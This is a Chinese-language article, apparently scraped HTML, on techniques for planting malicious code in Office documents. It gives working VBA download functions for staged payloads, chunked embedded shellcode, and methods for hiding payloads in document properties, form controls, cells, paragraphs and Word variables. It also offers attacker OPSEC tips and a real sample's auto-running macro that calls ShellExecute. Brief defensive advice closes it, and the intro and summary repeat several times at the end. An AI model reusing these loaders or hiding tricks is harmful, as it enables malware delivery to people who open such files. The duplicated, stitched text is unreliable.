Office文档恶意代码植入技术解析<\/h1>

前言<\/h2>
本文深入解析攻击者利用Office文档传递恶意代码的各种技术手段，包括分阶段和无阶段的实现方式，以及如何在OpenXML结构中隐藏恶意负载。这些技术虽然基础，但在实际攻击中仍被广泛使用。<\/p>

典型payload传输策略<\/h2>

1. 从网络获取payload（分阶段）<\/h3>
优点<\/strong>：灵活可控，可随时更换payload
缺点<\/strong>：网络请求易被检测<\/p>

实现方式：<\/h4>
Microsoft.XMLHTTP方法<\/strong>：<\/p>
Function obf_DownloadFromURL(ByVal obf_URL As String) As String On Error GoTo obf_ProcError With CreateObject("Microsoft.XMLHTTP") .Open "GET", obf_URL, False .setRequestHeader "User-Agent", "<<<USER_AGENT>>>" .setRequestHeader "Accept-Encoding", "gzip, deflate" .setRequestHeader "Cache-Control", "private, no-store, max-age=0" .Send If .Status = 200 Then obf_DownloadFromURL = StrConv(.ResponseBody, vbUnicode) Exit Function End If End With obf_ProcError: obf_DownloadFromURL = "" End Function <\/code><\/pre> InternetExplorer.Application方法<\/strong>：<\/p> Function obf_DownloadFromURL(ByVal obf_URL As String) As String On Error GoTo obf_ProcError With CreateObject("InternetExplorer.Application") .Visible = False .Navigate obf_URL While .ReadyState <> 4 Or .Busy DoEvents Wend obf_DownloadFromURL = StrConv(.ie.Document.Body.innerText, vbUnicode) Exit Function End With obf_ProcError: obf_DownloadFromURL = "" End Function <\/code><\/pre> 2. 直接在VBA中嵌入恶意数据（无阶段）<\/h3> 实现方式<\/strong>：<\/p> Private Function obf_ShellcodeFunc81() As String Dim obf_ShellcodeVar80 As String obf_ShellcodeVar80 = obf_ShellcodeVar80 & "800EK+3YvPe6wFO6tCVI91lg2Bi3ae8DNtlWbCczAi+XnmipCn3kRpi2js7bNntB0TC\/qn2WiYP275Z9" obf_ShellcodeVar80 = obf_ShellcodeVar80 & "HVkgI4GH7dOACixe7W5qjTL8HIzH6mYubKWDgvlbe72MfmkGUJKquPm+Ap5bRxceDpUag64Z3HccyfYM" '...更多拼接代码... obf_ShellcodeFunc81 = obf_ShellcodeVar80 End Function <\/code><\/pre> VBA限制<\/strong>：<\/p> 单行代码不超过128个字符<\/li> 单个函数\/子例程不超过128行<\/li> <\/ul> 缺点<\/strong>：代码特征明显，易被检测<\/p> 文档结构中隐藏payload的技术<\/h2> 1. 文档属性隐藏<\/h3> 位置<\/strong>：docProps\/core.xml<\/code>和docProps\/app.xml<\/code><\/p> 示例<\/strong>：<\/p> <dc:subject><\/span>calc.exe<\/dc:subject><\/span> <\/span><\/span><dc:creator><\/span>test<\/dc:creator><\/span> <\/span><\/span><\/code><\/pre>OPSEC注意事项<\/strong>：<\/p> 清除core.xml和app.xml中的元数据<\/li> 避免留下制作者信息<\/li> <\/ul> 2. Office表单控件隐藏<\/h3> 实现方式<\/strong>：<\/p> 将payload存储在表单控件中<\/li> 执行时动态提取<\/li> <\/ul> 检测<\/strong>：工具如olevba可轻易识别<\/p> 3. ActiveDocument段落和工作表隐藏<\/h3> Word实现<\/strong>：<\/p> ' 遍历段落提取payload For Each para In ActiveDocument.Paragraphs ' 处理文本范围 Next <\/code><\/pre> Excel实现<\/strong>：<\/p> ThisWorkbook.Sheets("Sheet1").Range("A1") = "evil" <\/code><\/pre> XML结构<\/strong>：<\/p> <w:t><\/span>7E69A3333033333337333333CCCC33338B33333333333333733333333333333333333333333333333333333333333333333333333333333333333333B33333333D2C893D33873AFE128B327FFE12675B5A401343415C5441525E1350525D5D5C471351561341465D135A5D13777C60135E5C57561D3E3E391733333333333333637633337F323133DB8A40643333333333333333D3333C323832310133CD3333337D333333333333FCCC33333323333333233233333373333323333333313333373333333333333337333333333333333353323333313333342D3133313333333333233333233333333323333323333333333333233333333333333333333333837E323387333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333<\/w:t><\/span> <\/span><\/span><\/code><\/pre>4. Word变量隐藏<\/h3> 实现方式<\/strong>：<\/p> ' 存储变量 ActiveDocument.Variables.Add Name:="varName", Value:="payload" ' 读取变量 Function obf_GetWordVariable(ByVal obf_name) As String On Error GoTo obf_ProcError obf_GetWordVariable = ActiveDocument.Variables(obf_name).Value obf_ProcError: obf_GetWordVariable = "" End Function <\/code><\/pre> XML结构<\/strong>：<\/p> <w:docVars><\/span> <\/span><\/span> <w:docVar<\/span> w:name=<\/span>"varName"<\/span> w:val=<\/span>"......"<\/span> \/><\/span> <\/span><\/span><\/w:docVars><\/span> <\/span><\/span><\/code><\/pre>实际样本分析<\/h2> 样本哈希<\/strong>：b1df072eba923c472e461200b35823fde7f8e640bfb468ff5ac707369a2fa35e<\/p> 攻击流程<\/strong>：<\/p> XLSB文件包含恶意宏代码<\/li> 从工作表单元格获取payload<\/li> 拼接字符串并执行Shell命令<\/li> 下载第二阶段payload（伪装为JPG）<\/li> 解码执行第三阶段payload<\/li> 最终与C2服务器通信<\/li> <\/ol> 关键代码<\/strong>：<\/p> Private Sub Workbook_Open() Dim g5 As String, g6 As String g5 = Cells(2, 7) g6 = Cells(3, 7) lyDdMyWVp = wJmdrV(g5, g6) End Sub Function wJmdrV(eeeew As String, ifgkdfg As String) Dim DGjG() As Variant ReDim DGjG(4) DGjG(0) = "p" + ifgkdfg DGjG(1) = "ping google.com;" + eeeew '...其他参数... Set sSVno = CreateObject("Shell.Application") zsEd = CallByName(sSVno, "ShellExecute", VbMethod, DGjG(0), DGjG(1), DGjG(2), DGjG(3), DGjG(4)) End Function <\/code><\/pre> 防御建议<\/h2> 禁用Office宏执行<\/li> 使用高级威胁防护工具检测异常文档行为<\/li> 定期检查文档元数据和隐藏内容<\/li> 对下载的Office文档实施沙箱分析<\/li> 培训用户识别可疑文档特征<\/li> <\/ol> 总结<\/h2> 本文详细解析了Office文档中隐藏和传递恶意代码的多种技术，包括网络下载、VBA嵌入以及利用文档结构隐藏payload的方法。虽然这些技术大多已被安全工具检测，但理解其原理对于防御新型变种攻击至关重要。<\/p>

Office文档恶意代码植入技术解析<\/h1>

前言<\/h2> 本文深入解析攻击者利用Office文档传递恶意代码的各种技术手段，包括分阶段和无阶段的实现方式，以及如何在OpenXML结构中隐藏恶意负载。这些技术虽然基础，但在实际攻击中仍被广泛使用。<\/p>

典型payload传输策略<\/h2>

1. 从网络获取payload（分阶段）<\/h3> 优点<\/strong>：灵活可控，可随时更换payload 缺点<\/strong>：网络请求易被检测<\/p>

总结<\/h2> 本文详细解析了Office文档中隐藏和传递恶意代码的多种技术，包括网络下载、VBA嵌入以及利用文档结构隐藏payload的方法。虽然这些技术大多已被安全工具检测，但理解其原理对于防御新型变种攻击至关重要。<\/p>

前言<\/h2>
本文深入解析攻击者利用Office文档传递恶意代码的各种技术手段，包括分阶段和无阶段的实现方式，以及如何在OpenXML结构中隐藏恶意负载。这些技术虽然基础，但在实际攻击中仍被广泛使用。<\/p>

1. 从网络获取payload（分阶段）<\/h3>
优点<\/strong>：灵活可控，可随时更换payload
缺点<\/strong>：网络请求易被检测<\/p>

总结<\/h2>
本文详细解析了Office文档中隐藏和传递恶意代码的多种技术，包括网络下载、VBA嵌入以及利用文档结构隐藏payload的方法。虽然这些技术大多已被安全工具检测，但理解其原理对于防御新型变种攻击至关重要。<\/p>